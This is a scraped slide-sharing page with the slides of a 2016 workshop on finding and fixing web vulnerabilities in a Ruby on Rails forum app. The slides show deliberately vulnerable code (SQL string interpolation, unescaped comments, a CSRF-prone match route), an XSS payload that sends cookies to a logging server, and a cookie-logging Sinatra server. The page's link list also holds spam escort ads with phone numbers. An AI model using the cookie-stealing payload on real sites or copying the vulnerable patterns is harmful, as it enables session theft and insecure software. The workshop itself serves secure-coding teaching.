Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionSolGuruz
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AIABDERRAOUF MEHENNI
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 

Dernier (20)

CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female serviceCALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
CALL ON ➥8923113531 🔝Call Girls Badshah Nagar Lucknow best Female service
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AISyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
SyndBuddy AI 2k Review 2024: Revolutionizing Content Syndication with AI
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 

Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example

  • 1. Web applications hacking Ruby on Rails example
  • 2. ● Software House located in Krakow ● Ruby on Rails, Android and iOS ● Specialized in building web and mobile applications ● Collaborating with many companies and startups from all over the world ABOUT US:
  • 3. 2009 - software house was founded 50 projects created 40 developers Awards: OUR HISTORY: Top Web & Software Developers in Poland 2015 Top Tens Ruby on Rails Development Companies
  • 7.
  • 8. OWASP TOP 10 1. Injection 2. Broken authentication and session management 3. Cross-Site Scripting 4. Insecure direct object reference 5. Security misconfiguration 6. Sensitive data exposure 7. Missing function level access control 8. Cross-Site Request Forgery 9. Using components with known vulnerabilities 10. Unvalidated redirects and forwards
  • 10. Simple Ruby on Rails forum Ruby 2.3.0 Rails 4.2.6 PostgreSQL 9.4
  • 12.
  • 13.
  • 14.
  • 15. # app/controllers/forum_threads_controller.rb class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by title: params[:title] end end # config/routes.rb resources :forum_threads, param: :title, only: :show do resources :comments, only: :create end SEARCHING THE FORUM THREAD BY TITLE:
  • 16.
  • 17. # app/controllers/forum_threads_controller.rb class ForumThreadsController < ApplicationController def show @thread = ForumThread.find_by “title = #{params[:title]}” end end # config/routes.rb resources :forum_threads, param: :title, only: :show do resources :comments, only: :create end SEARCHING THE FORUM THREAD BY TITLE:
  • 18.
  • 19.
  • 23.
  • 24. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= comment.content COMMENTS - create and show:
  • 25.
  • 26. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= comment.content.html_safe COMMENTS - create and show:
  • 27.
  • 28. <!-- XSS test --> Hi guys! <script> alert(“I came for your cookies!“) </script> <!-- Time to get some cookies! --> What’s up? <script> xhttp = new XMLHttpRequest(); xhttp.open(“GET”, “http://localhost:4567/cookies/” + document.cookie); xhttp.send(); </script> XSS ATTACK - TEST AND STEALING COOKIES
  • 29. require ‘sinatra’ require ‘logger’ logger = Logger.new ‘log/cookies.log’ get ‘/cookies/:cookie’ do logger.info ‘=== COOKIE ===’ logger.info params[:cookie] logger.info ‘/== COOKIE ===’ end XSS ATTACK - SIMPLE COOKIES LOGGING SERVER
  • 30.
  • 31.
  • 32. Are all cookies HTTPOnly in Rails?
  • 33. cookies[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’ // document.cookies=”after_sign_in_path=’http://malicious.site/phishing’” cookies.signed[:after_sign_in_path] = ‘http://localhost/after_sign_in_path’ // document.cookies=”after_sign_in_path=’http://malicious.site/phishing’” cookies.signed[:after_sign_in_path] = { value: ‘http://localhost/after_sign_in_path’, httponly: true } // finally safe UNFORTUNATELY - NO. ALWAYS USE THIS HASH!
  • 34. It’s safe from cookies stealing, but is it safe from XSS?
  • 35. # app/controllers/comments_controller.rb class CommentsController < ApplicationController def create @thread = ForumThread.find params[:forum_thread_id] @comments = @thread.comments.build comment_params @comments.user = current_user if @comment.save redirect_to @thread, notice: ‘Successfully added new comment’ else redirect_to @thread, alert: “Couldn’t save comment“ end end private def comment_params params.require(:comment).permit(:content) end end # app/views/forum_threads/show.haml %p= sanitize comment.content.html_safe COMMENTS - create and show:
  • 37.
  • 38. # app/controllers/application_controller.rb class ApplicationController < ActionController::Base # Prevent CSRF attacks by raising an exception. # For APIs you may want to use :null_session instead. protect_from_forgery with: :exception end DEFAULT CSRF PROTECTION IN RAILS:
  • 39.
  • 40. Is Rails CSRF protection unbreakable?
  • 41. HTTP Verbs ● GET ● POST ● PUT ● PATCH ● DELETE ● HEAD ● OPTIONS ● TRACE ● CONNECT
  • 42. HTTP Verbs NOT protected by Rails CSRF ● GET ● POST ● PUT ● PATCH ● DELETE ● HEAD ● OPTIONS ● TRACE ● CONNECT
  • 44. # config/routes.rb match ‘/forum_threads/:forum_thread_id/comments/:id/update’, to: ‘comments#update’, via: :all # Rails 4+ CSRF PITFALL IN RAILS ROUTING - MATCH:
  • 45.
  • 46.
  • 47. Is Rails CSRF protection 100% safe?
  • 48. Yes it is - unless you’re not staying close to Rails guides
  • 50.
  • 51. Sensitive data exposure 1. Credentials leaking to public repositories. 2. Lack of proper in-app authorization. 3. Debugging information in production enviroments. 4. Access not restricted, wrong access privileges. 5. Lack of encryption. 6. API responses containing sensitive data.
  • 52. Protecting against sensitive data exposure 1. Code reviews. 2. Careful authorization. 3. Strict access. 4. Encryption. 5. API exposing only necessary information.
  • 54.
  • 55.
  • 56. # app/controllers/forum_threads_controller.rb def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads } end end GENERATED RAILS API
  • 57. [ { ”id”: 2, ”title”: "Curabitur vel vulputate libero.", ”created_at”: "2016-04-18T10:10:40.648Z", ”updated_at”: "2016-04-18T10:10:40.648Z" }, { "id": 1, "title": "Lorem ipsum dolor sit amet.", "created_at": "2016-04-18T10:10:40.607Z", "updated_at": "2016-04-18T10:10:40.607Z" } ] GENERATED RAILS API - OUTPUT
  • 58. # app/controllers/forum_threads_controller.rb def index @threads = ForumThread.order(updated_at: :desc) respond_to do |format| format.html format.json { render json: @threads.only(:title).to_json } end end GENERATED RAILS API - SECURING THE OUTPUT
  • 59. [ { ”title”: "Curabitur vel vulputate libero." }, { "title": "Lorem ipsum dolor sit amet." } ] GENERATED RAILS API - SECURED OUTPUT
  • 60.
  • 61. Solutions for building pretty, secure APIs Active Model Serializers ● Object Oriented approach ● Ability to define decorating methods ● All Ruby! ● Flexible ● Easy to test ● Adapter to follow JSON API v1.0 schema ● YARD documented Jbuilder ● Templates approach ● ERblike - might be easy for newcomers ● Flexible ● Hard to test ● No real “adapter” - if you want JSON API v1.0, you have to do it by yourself
  • 63. Things to remember from this workshop: 1. Never trust anything that comes from user. Params, cookies, headers, everything. Nothing that comes from user is safe to use. 2. Always sanitize your HTML output. Especially when you’re allowing links or images that comes from user. 3. Be careful with match routing. Just don’t use it if you don’t have to. 4. Inspect your outputs. Return only necessary information from your API. 5. Last but not least. Get someone to review your code.
  • 64. Thank you for your attention.
  • 65. Na zjeździe 11 30-527 Krakow, Poland tel: +48 12 391 60 76 Silicon Valley Acceleration Center. 180 Sansome Street San Francisco, CA 94104 tel: 1-415-449-4791 info@railwaymen.org www.railwaymen.org @Railwaymen_org railwaymen.software.development /company/railwaymen